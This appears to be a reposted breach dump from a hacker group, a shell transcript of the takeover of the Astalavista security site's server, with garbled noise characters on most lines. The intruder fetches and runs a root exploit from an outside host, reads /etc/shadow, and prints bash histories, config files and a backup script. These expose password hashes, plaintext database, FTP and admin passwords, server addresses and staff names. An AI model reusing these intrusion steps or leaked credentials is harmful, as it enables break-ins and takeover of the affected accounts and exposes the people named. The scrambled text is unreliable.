6 H8 n" h5 e( t0 Q1 ?  J  HBye$ Y% ]) [( W* h$ l2 w# N# ^& r

) A# e' A1 b, p6 E% P) g* _[~] plaintext passwords? yes,
' Z1 {/ {$ y+ x& K6 G; U& Y% qThose so called “security professionals” who charge you $6.66 / month to
: ]- N2 B: c1 P' E6 ~register at their hack-proof portal, save your passwords in plaintext…
& F) O( S: n; z) G. ?7 V- B- o6 S+ D8 kbrilliant!
4 v$ S3 N. W: ]7 k- r& G5 C( T; G
[~] This been fun but we want more.  @" x9 V2 f/ ?9 v0 x/ e' |# N9 g$ q

( g. c2 c0 R& Y; Ish-3.2$ uname -a
; Q* V9 c( Q* z4 C6 J/ |8 r0 aLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
3 H3 x- M' \5 esh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]2 g6 r0 ?' `; R7 x( o8 h
–13:33:37–  链接标记[url]http://anti.sec.labs/g0troot[/url]" Z, {! x2 E: P) e
Resolving anti.sec.labs… 13.33.33.374 u( {- @% E$ U8 X; [+ P" i) d- e" `
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
' g) i. |9 D/ D# |9 HHTTP request sent, awaiting response… 200 OK
; f+ z4 X% y7 c& `9 N+ D! ^: s  lLength: 18200 (18K) [text/plain]
- i: s, r+ {3 nSaving to: `g0troot’. e7 ?. A7 u- J$ `/ {

& q: |+ E- p* B6 F4 p7 `  B0 [7 N6 ]100%[=========================================================================================================================================>] 18,200      58.6K/s   in
$ |- q! a3 d2 Q: e4 V9 U+ f0.3s, B: B/ J. r  R8 l2 M; r
% k+ O, z& n2 r) B8 F  K
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]9 m# w2 I' f/ C1 i: c& V: i' c" b
4 }' |) Z; X" k1 N% D. U
sh-3.2$ ./g0troot -i x86_64
, _1 H. K" K# ]" H[+] g0troot - anti.sec.labs- B. L" o! O: F% A7 L
[+] Target: 2.6.18-128.1.10.el51 Q2 k- r/ m' l0 n; J, m
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
; @; f7 e9 I% B4 u# ]) C. q
" h2 P2 ?5 O; M/ v! `: P[+] r00tr00t
- U/ l; E* u" x8 b6 d[~] Executing shell…/ m* A+ \& z- E
- V  J8 n4 W$ w2 K: u- v, {
sh-3.2# id4 F& K5 L2 l& n8 M, C
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)- b+ C' Y/ _( C" b% h

" V8 W7 H9 P  O, d  T- F+ Rsh-3.2# cat /etc/shadow
# V# g. o3 \: Q3 @9 M6 Y5 E, ~  aroot1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::) ~  j6 M. j; Z) }+ o* ~
[snip]
. m0 Q) i% l1 H+ ?1 X- cadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
' J: t5 E/ R! Y# o, V; Y/ Rjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::6 c6 q) `5 }$ q# o
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
' L7 E5 M  @/ O& z5 Hastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
3 w, E$ N* P" N& e; F6 F7 U" z2 n5 g: k* c' N
sh-3.2# cat /etc/motd
: d3 N) n! G' x- o0 y: J& M* u#####################################################  B6 p3 V0 C6 p: t. z5 S
#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #
. E& S: M4 k: I0 w9 U" A# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #
9 `" s0 L& P/ _9 [# U  O# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #' b1 z$ b1 d! D' K- L4 u' x
#                                                   #
0 S1 Z0 ?6 n; M# f/ P#####################################################% F: P7 r% ^+ ]8 i1 L; ^/ U
#                                                   #; W# F' C/ @/ J3 N( T+ t, \8 }% Y
# Admin Contact - 链接标记support@secureservertech.com      #. _4 |; W, `5 n5 H' q4 {
#                                                   #! E: p# u9 A% p3 ?  ~9 K
# Available ShortCuts                               #
- V2 C7 H. k  `* d+ [* V2 f#                                                   #9 t5 B! i7 C2 ^7 ?6 t* R
# nst -  list active connections                    #
; C- Z! e; }7 b' d' o$ X" w$ @# ddos - shows how many times each ip is connected  #
( U$ J. Q5 `! E/ N5 [# ltr -  restart the webserver                      #
7 b6 Q+ k5 Q- ]/ V& d6 z: [2 J# phpc - edit the php config file                   #/ P+ ?0 }" K. p6 i+ m
# htc -  edit the webserver configuration file      #
' {- |# v0 ~' y5 |& r4 U' v& ~# up -   uptime                                     #
  I7 |) B& }; b$ E* e) m# etd - edit the motd of the day file               #! S/ D; I4 }; c
# htr - start and restart apache if needed          #
; G; o' w: @& L# syng - shows active SYN_RECV connections          #1 ]* ?; g! O' U* f0 z  ^' T1 j
# synd - syn flood blocker - “synd -h” for usage    #2 G4 N# U: a& E$ v
#####################################################
) Q. E! }6 }; @- j* i: y# NOTES:                                            #
" N* g0 a* d8 _4 y# Last Upgrade - 12-08-2008 by JF                   #
8 n$ o4 o1 M; b8 y5 [# My.cnf/Mysql Optimization - 1-28-09               #$ j% B% ?2 G( |+ Q* M
#                                                   #0 y! r) h+ ]+ L7 y1 u
#                                                   #
# Z7 \2 C- t/ r, Y#                                                   #) `! W0 t8 ^( f7 w8 D0 l8 Z
#####################################################6 _+ [; N& V( O5 T' Y

; @" v$ X& M) ~/ ^1 D# _sh-3.2# lastlog | grep -v Never
* o4 y* V. Z# [- r8 nUsername         Port     From             Latest
9 g4 f" g  d1 Q; ]6 i) T0 ]( {root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 20093 T# A$ }/ R9 O
admin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008
5 H+ p* e- J& J* e- R7 j4 `com              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 20097 ?: k+ _8 z/ Q. C5 O
astanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20098 t  ^! @, W; E( Y
& ^1 f0 V( @% h6 O
sh-3.2# ls -la
7 C* y) u4 ?$ b8 J( V7 ]& `total 453376
% K- z/ w7 _3 o( }( ~drwxr-x— 15 root root       4096 Jun  4 08:40 .. X% G; n  X2 y( X# c; F
drwxr-xr-x 25 root root       4096 Jun  3 02:43 ..
  m9 @; P1 ]9 Z6 K! u6 V4 B6 {( s- j-rw-r–r–  1 root root    2394400 Oct 19  2007 10mbtest.zip( K; Z) q, w4 o% v; B
-rw——-  1 root root       1006 Sep 11  2007 anaconda-ks.cfg0 R' k6 c: \. D; |; g/ T1 r- X! ^7 L
-rw——-  1 root root      16836 Jun  4 07:21 .bash_history
) c0 r1 f. ]( w6 u) b7 e0 A-rw-r–r–  1 root root         24 Jan  6  2007 .bash_logout4 q3 m% }0 q/ r9 Q/ {8 R/ S
-rw-r–r–  1 root root        191 Jan  6  2007 .bash_profile
% B( C  E4 A6 h$ t8 L-rw-r–r–  1 root root        176 Jan  6  2007 .bashrc* {+ n) q8 a3 {- M
-rwx——  1 root root       1899 Oct 28  2007 bk.sh
3 a% v$ M# j# {0 O: V5 K4 v-rw-r–r–  1 root root       1327 Nov 29  2007 cert
% a1 I: M* J; a7 R-rw-r–r–  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql3 H0 b2 V' ~& |9 R' c1 \& c7 \
drwxr-xr-x  4 root root       4096 May 20  2008 .cpan
! s% ?3 T( A% X  c-rw-r–r–  1 root root        100 Jan  6  2007 .cshrc8 x. U" a8 m, m9 c! n9 D8 [1 d( h
-rw-r–r–  1 root root     323079 Mar 31 13:48 defaultp_ports.sql
4 `7 Z& b+ M! f1 b4 F& ?+ ^drwx——  2 root root       4096 Oct 28  2007 .elinks
8 n" ]' g8 w9 ?6 s" J# ddrwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.15 A: v  N, I5 R# |
-rw-r–r–  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2  d2 N  S' l+ j; Y: c$ T  K
-rw——-  1 root root          0 Apr 16 13:19 .history/ U+ q$ w* q/ r5 `  s, S
-rw-r–r–  1 root root      16095 Sep 11  2007 install.log
8 ~( |* p  |0 {% X2 L, [9 c-rw-r–r–  1 root root       2566 Sep 11  2007 install.log.syslog% \8 A% E2 O: v
-rw-r–r–  1 root root       1003 Jul 22  2007 install.sh
& G1 H% Y/ D+ t: _8 A-rw——-  1 root root         35 Jun  2 14:23 .lesshst
" t" V; D! \/ u$ _! Z& A* g. edrwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp
* a- e  M7 ]$ d+ o, V/ Ddrwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec9 I# [- C- p2 K% u3 j3 J
-rw-r–r–  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz
; c9 Z# R( b3 J3 g+ H-rw-r–r–  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2
6 z/ I, E* P! m0 D" x" b& A& Z6 K! i-rwx——  1 root root        760 Sep 18  2008 lp
5 H' D8 O  U" C" s5 F* Udrwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.15 z/ }5 e+ M7 o! w; Q! |
-rw-r–r–  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz0 E. t1 j* V' s( o6 O2 }% [- b( ^' N
-rw-r–r–  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
3 Z/ J7 P2 V+ b' s5 h7 h/ ?% Zdrwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.9
/ S8 F5 K! ], W7 C9 M, ^$ n-rw-r–r–  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
+ L- I2 S7 |' p3 K; d6 h6 B$ ydrwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.38 h( A( f1 [9 T, I- r- e
-rw-r–r–  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz" J" Q7 G: p; V# i: n+ J* m" B4 {* [
-rw-r–r–  1 root root      25316 Feb 15  2006 mybk.sh2 H$ x- B8 R. R% g
-rw——-  1 root root         41 Oct 19  2007 .my.cnf# }, t  g$ y" L
-rw——-  1 root root       2902 Jun  4 08:40 .mysql_history; \; K! N8 a$ {
-rwx——  1 root root      38873 Apr 16  2008 mysqlreport
7 H1 _. E6 ]* b( {-rw——-  1 root root         41 May 20  2008 .mytop
1 `! w3 v! ?$ z7 y3 a9 ydrwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.68 F* t8 M4 p5 s
-rw-r–r–  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz- C4 q+ s& _' F8 O
drwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp3 b1 V( m! ?# U" y
-rw——-  1 root root       1462 Sep 21  2007 opt.php
- c4 R' q, R9 f6 z6 l' A4 N-rw-r–r–  1 root root       3371 Sep 22  2007 p; R2 R( a) J  f. R  P3 }' A
-rw-r–r–  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz20 ]) Q- {; D& v+ _# N$ X) F  m
-rw——-  1 root root       1024 Feb  3 21:32 .rnd
& t7 a8 Y5 j# `8 Z' M& Q& h$ t, ~-rw-r–r–  1 root root        716 Nov 28  2007 server.csr
7 r( E6 e$ ?4 d" [* @3 Y# G-rw-r–r–  1 root root        887 Nov 28  2007 server.key
$ I) i- S- ?* Wdrwx——  2 root root       4096 Oct 10  2008 .ssh6 K9 p, M. E6 k( p, l; {' G
-rw-r–r–  1 root root      44227 Oct 28  2007 tar-inc-backup.dat
; h* t! r4 b+ \6 J-rw-r–r–  1 root root        129 Jan  6  2007 .tcshrc
( u, G3 J) L. k- Z! z/ p-rw-r–r–  1 root root  104874307 Oct 17  2007 test100.zip
8 P6 P% m5 U1 K3 Q% s5 e-rw-r–r–  1 root root   67085540 Oct 19  2007 test100.zip.14 A- Y7 U/ n2 e, a1 S2 w! c
drwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp
" P$ y% |) N/ Y2 p-rw-r–r–  1 root root      42596 May 21  2007 tuning-primer.sh* i) |. ]0 \) ^) b! o
drwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0
4 M1 v9 E% J4 ^; {7 ?-rw-r–r–  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2
$ r% c; X; F9 B# n" g) S4 n-rw——-  1 root root      12997 May 16  2008 .viminfo
2 i1 t7 L) D2 P, r) s) s. ^" c6 ?6 a
, S* _0 J1 c" s9 l8 U$ e6 b, ysh-3.2# cat .bash_history
7 `% o0 }& ?7 p1 \, }9 Y# H[snip]
: J& N  l$ a$ _! u) Q, }; bwget cp4sst.com/sstlinux.tar.gz. K) D+ h% c: v; ^, s5 b% ?  u9 n
tar zxvf sstlinux.tar.gz
# x0 z# R1 O! U$ ~% kcd linux-2.6.27.10
4 C5 `: n! }9 E7 O6 tsh install.sh) X8 \& L8 R  E! L
make bzImage ; make modules ; make modules_install ; make install, j7 H- }1 r/ o* v$ A+ s! Y0 Y. ]9 u
make clean' `* M8 D1 v6 D- ]
service mysqld restart/ G4 _; g4 d; j5 H% d* G
[snip]
8 O7 g& W( K1 j" {cd /usr/sbin// T2 Y5 V3 A* O) R
chmod 4777 traceroute
1 q0 a) M9 _; wchmod 4777 ping
, d& b0 R; f2 q: B; ~) J9 ftraceroute -I 链接标记[url]www.astalavista.ch[/url]
* _4 J3 a2 ^3 g( `& ]. w# C[snip]  W. \, i/ t0 R3 y$ ~$ A
vi /etc/csf/csf.conf+ E$ X/ D7 |6 K
traceroute google.ch% V6 T; y) ^4 X0 }! X
service csf restart4 m7 s  Z4 I1 u& q) {
tracert google.ch; a/ ]* g& T5 {$ s
service csf restart/ u) U& s3 t) |/ U8 `2 j' b7 X2 m" Y: f
traceroute 链接标记[url]www.google.ch[/url]9 L$ j8 s( l8 _3 P- m
tracert 链接标记[url]www.google.ch[/url]; c' i* U& W) \
traceroute 链接标记[url]www.google.ch[/url]8 u8 m1 Z! w5 `( }, J& r* l/ m; S! v" F
locate traceroute3 o7 v8 i8 g. x/ @$ V
chown 4755 /bin/traceroute
  e( G' d3 Y$ _5 k& H* x! Xchown 4777 /bin/traceroute$ U8 Q6 s7 R/ {2 f' w
locate ping* z' ]  {9 M  V, x+ u2 V# h
chown 4755 /bin/ping4 j* p( {- M( B& `8 k
chown 4777 /bin/ping
$ F$ p9 s' R1 [) Hcd /bin/
" l% R# O9 p/ X7 P' a  A: c& bls -ali | grep ping1 L/ l9 F& M; c/ {- C% p1 A8 l" Y
chown root ping
" j6 ]0 ?+ \* J( Q9 Vchmod 4755 ping$ p/ }1 p6 b% b
ls -ali | grep traceroute6 T7 |+ ?0 b  I" m7 w. e
chown root traceroute
, S: d2 y! @1 F  A: Zchmod 4755 traceroute. i/ k3 H  d! \, {5 K, z. v
ls -ali | grep traceroute
% Q, a& g3 X- b# btraceroute -I 链接标记[url]www.google.ch[/url]
+ F: a7 L3 E( t. ntraceroute 链接标记[url]www.google.ch[/url]
$ S) x/ s: p8 F7 e- P6 l0 Lwhois pmsantos.ch
/ o8 v2 [3 k$ P* f6 w: v5 a[snip]
4 n, B/ f( M( V7 Zmysql -h com_contrexx2_live < /root/defaultp_ports.sql1 n; _2 F# |% M" R1 p. U9 V
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql' M3 E5 v0 }4 c' |8 O$ ]
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql3 @% G0 }# @( e' v
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql( S7 {6 |/ w0 d+ e; B
top; r% {1 D% j5 x5 O
ping ssth.ch
8 `/ x5 v  S! V) Hping asdlkfaljgasd???ljg???lasj.ch* O' S3 ~" m" Q% `5 B0 A& [  G
ping asdlkfaljgasdlasj.ch# Z5 E* M. L3 K4 [' Q
ping 链接标记[url]www.ssth.ch[/url]- F1 L3 Q$ u. d, \. c, t/ J
ping ssth.ch  d2 ~+ b. o5 x, s
nslookup 链接标记[url]www.google.ch[/url]
* o: l9 o$ u9 g0 A1 enslookup 链接标记[url]www.ssth.ch[/url]0 L9 d* k' \5 \4 c" [3 H: \
man nslookup8 a* `0 ^- B7 c3 g- ^0 Y
ping 链接标记[url]www.google.ch[/url]" r6 X3 ?7 \& y$ _3 ^+ d1 c
nslookup 链接标记[url]www.google.ch[/url]9 p- [; K2 @" \; O; ]
nslookup 链接标记[url]www.google.ch[/url]
/ y  z8 D9 x- Onslookup salfjasdlf.ch
. I/ C# E; u5 i7 h8 Q! C[snip]' m" V" B) i- r( Q; A5 X
openssl passwd -1 sadf
- B/ w' I5 [; |& y* C" O9 Kopenssl passwd -1 5cZNHstdTy
' U! K$ Y! s/ Vmysql
1 t5 i& p$ @8 p, m+ T& Z0 Bmysql# P  L* t4 b6 w" x* y$ y5 a
locate proftp
( l+ A7 L, C* O. N6 @* uvi /etc/proftpd.passwd+ ^6 n: I# S% S! x7 _
service proftpd restart
/ V; q' s( l0 N" e4 T% Qlocate proftpd.conf4 a  w; w" m( O+ X1 V
vi /etc/proftpd.conf
4 R; ?8 C" d( u4 r$ ]vi /etc/proftpd.passwd
0 r8 L2 i7 f; f( e2 _service proftpd restart
3 y2 b7 S! z, i' L[snip]
* ~7 Q  g  p4 _% f" w1 o) M- V/bin/sh /home/com/backup_system/backup.sh
8 [4 @& F3 p' Z  V+ ~% ~tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin+ h( V0 |, W6 e+ ~
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
3 E& \+ c" g6 e5 [$ ?mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql& w7 d$ p. K) }; H' m' ?
ls -ali
9 @+ _( m! H$ n; C# f1 rmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql4 O7 y! q- a$ e1 D# |  k% u
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql  c+ A1 A' }% k$ F: L9 \
crontab -l. S" U# {7 g/ R) Q% j7 N
crontab -l
1 |# I+ c9 R4 }1 C4 xphp -q /home/com/public_html/modifications/cronjobs/securitynews.php: ^; W+ V& L3 L* V% W
/home/com/public_html/modifications/cronjobs/exploits.sh
+ L. O' a( F" P$ twget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
7 j$ [7 }; L% S5 d8 K6 Ytar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz! f8 E; p3 _4 a8 q; C: E
cd lsws-4.0.3
, E* i# E/ |( o+ K  Fsh install.sh
8 J, }5 i0 U0 |; Y2 p4 J* wuptime
- `) g/ d. _2 t: Q: l& W* dhdparm -tt /dev/sda
2 `9 t3 G& u5 H0 K& S( }0 q. B9 F  aiostat
" k1 _2 q/ Z0 E$ ]6 |- Ayum install iostat
# |- K* b' ?8 \) Z' ciostat
( E6 [# P" N* \) P* ~. v, a  x$ swhereis iostat
- F5 ^5 M0 d+ h4 Q) y4 gyjm clean all1 M$ ~8 P) n1 k0 G
yum clean all ; yum -y update
4 |6 o1 k! P  b: {$ Xiostat
( K! W4 v' w4 O( Q% Ryum install systat
  q1 l! Y+ D2 _rpm -qa | grep iostat
- d8 C$ [7 L4 L3 n9 s3 w# z+ I5 Brpm -qa | grep sysstat1 u, n" s: w  L" y
rpm -qa | grep systat
$ X$ A) w/ n6 r5 s' xdmesg -c
% J8 A! Z1 Q, V- l$ d0 G4 r* `sysctl -p
( N8 g8 y5 J" J4 Kuname -r
1 d: b6 \' ^3 i2 Hcd /usr/src- F, }! M7 I" M
wget nix101.com/kernels/sstlinux.tar.gz4 V- O- ?: K& Z" X
shutdown -r now
/ X7 S( @, ^$ N, {4 ?. c$ a7 X3 ]nano -w /boot/grub/grub.conf: F1 ]9 k1 j% [% N5 D
7 F2 S8 ]' h$ I7 i) r- q
sh-3.2# cat .my.cnf
3 M& J, n# G4 U# E0 w[client]
& z' `* u) U8 g  fuser=da_admin. M# b0 ~0 |2 H0 e) H" C& T1 m, y9 i  Q
password=X9dctmRH1 T0 v/ ?* \$ i. t

" t, N$ j0 [$ J; B9 t6 ]/ c' o' bsh-3.2# cat /home/com/backup_system/backup.sh
0 W& t9 m7 Q- Q3 `$ U6 w% x#!/bin/sh! Y) k# t! {+ `6 c! z
#####################################################################
- k7 |/ B1 |  k#                                                                   #
/ s2 \9 a* M3 V. n! G8 Y3 Q#   incremental backup for astalavista.com                          #8 K! {) U5 `" }5 S
#                                                                   #5 a* q" p: y$ h$ e
#   author:    Paulo M. Santos <链接标记paulo.santos@astalavista.com>       #
* B9 x8 l$ i: F#                                                                   #
$ E$ r" V4 `, ]' `7 G#####################################################################
: D! R* h* ~! `. P) ^) l. t[snip]
  Z1 t2 G7 y+ c- r4 f+ Q/ P* fPROG_DIR=”/home/com/backup_system”;- ?- u- t8 ], l! e2 |9 X. t9 }
BACKUP_DIR=”/home/com/backups”;7 O0 A0 J1 F- q
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
2 I+ J- G0 u; A6 T+ z# p# ftp for synology backup server
5 \7 z# D; [' N% o9 _FTP_HOST=”212.254.194.163″;
3 f1 E* T6 d3 O9 c5 n( n  uFTP_PORT=”21″;
! Q8 U' h" m0 l2 M$ J  tFTP_USER=”astalavista.com”;/ l* m* l; v+ X9 z  I4 i
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
; ]" W3 S) W& IFTP_DIR=”/astalavista.com”;
! _8 Q+ Q8 J7 o* y7 @# database$ F$ \( v, |7 X
DB_HOST=”localhost”;
8 c! ?* Y* P8 O# t  y& JDB_USER=”contrexxuser2″;5 B9 Y$ A7 G7 e6 e( g5 p- w8 w
DB_PASS=”0fEYNZgXz1pKe”;
: j# M2 E8 P' B6 m) S9 LDB_DATABASE1=”com_contrexx2_live”;
- R7 z/ U& X5 L: P7 @DB_DATABASE2=”com_contrexx2″;( Z# ~! f9 `! q! i2 [  |: L5 t- i
[snip]) V- T0 q* V) \* g
ftp -in $FTP_HOST $FTP_PORT <<EOF! g9 W: `+ T0 g4 @6 [9 ^/ \. p
quote USER $FTP_USER, a1 ]7 Q8 y: u+ J$ |* `* M( W
quote PASS $FTP_PASS
4 M8 `9 k/ r) d# a5 S- {cd $FTP_DIR# f, p# M) u" y9 E
put $DB_FULLNAME-SQL_Dump.tar- ]) [0 v- \  {; l2 l6 z# M
put $BACKUP_FULLNAME-Public_HTML.tar+ v0 x8 O4 u- H8 f
close
0 V. X5 N- h# }4 V; y, i, j$ _, P: Gbye. F) Y2 s$ l, L* m5 k
EOF
+ X0 |0 x+ `. x  h% N
( i+ T( r: m$ ~4 ?* bsh-3.2# cd /home! x/ x. v: H6 g; V- U! ]9 n8 g* h
sh-3.2# ls -la
7 `* A) Q6 K5 W: t9 ?6 x, p5 P# J0 N- Stotal 1201 ^- Y3 T& t2 ?3 ^8 J
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .0 ^- w5 ~, `. V- c& n
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
$ b7 U; T  e; x% t* Qdrwx–x–x  9 admin   admin    4096 Nov 28  2007 admin9 N& B, l3 Z7 ?! g! _; D' t
-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group
" i; Y1 U: @5 d  A3 M-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user9 ~5 X  Z+ X' s3 X. h1 D/ P
drwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
" p2 P' I7 A  A% a% p# `* N4 Kdrwxr-xr-x  2 root    root     4096 Jul 29  2008 backup1 R% U- z* q" j& h
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.141610 P8 k: Z2 r, A4 t* k7 f
drwx–x–x 10 com     com      4096 Apr 28 12:40 com
# y2 q$ l' W$ O8 ^$ cdrwxr-xr-x  2 root    root     4096 May 17  2007 ftp
1 r/ D  A, ^) ^" ]: D" Gdrwx——  3 jon     jon      4096 Sep 21  2007 jon9 `! t' R. Z3 ~/ n- Q& W! g; `, T. l
drwx——  2 root    root    16384 Sep 11  2007 lost+found
6 ]% n4 p' f9 ~drwxr-xr-x  2 root    root     4096 Sep 14  2007 my3 `; E1 Z& B- @3 q/ I- b4 y' L1 h; |/ {: ]
drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata: P" {4 U; M( j0 ]/ a$ ]# N. C
drwx——  2 jon     jon      4096 Sep 15  2007 test
, i1 G& d- O9 i5 ?drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp0 I) u+ g- P  V2 E/ w! V8 G9 l$ u
' `) M3 p6 L' ~& A
sh-3.2# cd admin
& N# _6 W9 Z8 r7 d1 [4 u1 dsh-3.2# ls -la
& ^2 Q: l5 c4 ^) gtotal 17358960 o4 V% `% e( S8 l! b7 V
drwx–x–x  9 admin admin       4096 Nov 28  2007 .7 ~8 ?  R6 u. c; j7 S) R0 G  V
drwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..
9 E2 p( I, @, {- ?( k6 m: b0 ~drwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups2 B7 v) n2 @7 O$ H
drwx——  2 admin admin       4096 Sep 28  2007 backups
6 M5 J6 J1 a5 f# r# [6 E6 I-rw——-  1 admin admin        860 Sep 17  2008 .bash_history4 P* ?6 ~6 }) j. W4 k: Y2 y
-rw-r–r–  1 admin admin         24 Sep 14  2007 .bash_logout! K' l. Z$ _# X0 u& c' z9 U1 P
-rw-r–r–  1 admin admin        176 Sep 14  2007 .bash_profile
% E5 ]+ [" b! m/ y8 C$ _5 d-rw-r–r–  1 admin admin        124 Sep 14  2007 .bashrc& \  h( U- C& D) x
drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups+ q/ g- p: y5 n* M% _: ?
drwx–x–x  6 admin admin       4096 Sep 21  2007 domains
: L+ L! ?- Y: g* H+ wdrwxrwx—  3 admin mail        4096 Sep 21  2007 imap
) L. U) H& e1 x' D/ }( r. e$ @/ e-rw-r–r–  1 root  root          24 Sep 21  2007 info.php- Q6 O! M6 r  \5 Z
drwx——  2 admin admin       4096 Sep 21  2007 mail3 B4 e( q% J( d
-rw-r–r–  1 root  root         716 Nov 28  2007 server.csr
) T) Q( G/ B- p  c2 O) q-rw-r–r–  1 root  root         887 Nov 28  2007 server.key
# o2 M  T' v: n+ ?-rw-r—–  1 admin mail          34 Sep 14  2007 .shadow+ G3 d$ B3 N/ a+ S% f! x3 o
-rw-r—–  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz
/ z8 A; ~! Q! e$ O. Zdrwx–x–x  2 admin admin       4096 Jul 29  2008 user_backups
6 A! D) t1 r9 |' Q. _. g$ {: j8 U+ _
sh-3.2# ... J2 _2 m: O3 B0 n6 E. L
sh-3.2# cd jon
* `. G/ w1 q! Y0 Rsh-3.2# ls -la
5 J1 O5 V" F; k/ Ytotal 36, y  q* l- h  E3 o1 m$ u1 o& D
drwx——  3 jon  jon  4096 Sep 21  2007 .; d9 {2 w+ |) l
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
4 n1 e" u. w) A% S% Q-rw——-  1 jon  jon    53 Sep 21  2007 .bash_history
6 g. c& h( Z& i, }+ y-rw-r–r–  1 jon  jon    24 Sep 21  2007 .bash_logout9 q3 d# S- X8 O2 F
-rw-r–r–  1 jon  jon   176 Sep 21  2007 .bash_profile
/ M/ v8 v9 _( x: |0 Z& T-rw-r–r–  1 jon  jon   124 Sep 21  2007 .bashrc- y: e; M# b0 A* p+ [- T
-rw-r–r–  1 root root   24 Sep 21  2007 info.php
; ~" E7 E' X. c! T! v. |" p* bdrwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html
( _* w" e% o9 b" E
1 ]( x% I8 U: y8 c5 dsh-3.2# cd ..
5 R- @' ~4 Q: \  Xsh-3.2# cd test
( x9 j& a/ ^" O: K4 D! Zsh-3.2# ls -la
, t7 d% q; Y) O8 |. s# Wtotal 482 u( J: @/ v/ C" h" a- C
drwx——  2 jon  jon  4096 Sep 15  2007 .* D( t3 t% G% j6 e% c
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
3 q# Z4 r* o( h5 c; L9 H-rw——-  1 jon  jon    79 Sep 21  2007 .bash_history% Y& f5 t/ M& [8 u' S) l. o
-rw-r–r–  1 jon  jon    24 Sep 15  2007 .bash_logout
0 J* \! Q4 c& J( c5 _-rw-r–r–  1 jon  jon   176 Sep 15  2007 .bash_profile
* d* F9 z. o  i* T. T/ M-rw-r–r–  1 jon  jon   124 Sep 15  2007 .bashrc
& x! v- K+ v+ Y: [# u! ]  osh-3.2# cat .bash_history1 m. F' w2 I& C" J
/usr/bin/mysqladmin -u root password PoliuJhytg67- s$ A) I6 \$ ^! N- o+ d0 ^
) V! I; \, U( o$ j  ~* o
sh-3.2# cd ..$ d  ]7 c- M5 {9 \6 R* Q! C- o6 d6 W
sh-3.2# cd astanet( A( W# l2 d! p: a
sh-3.2# ls -la2 m1 S/ E+ _2 b9 ?
total 52& t- N' m- O  {! s' w9 f
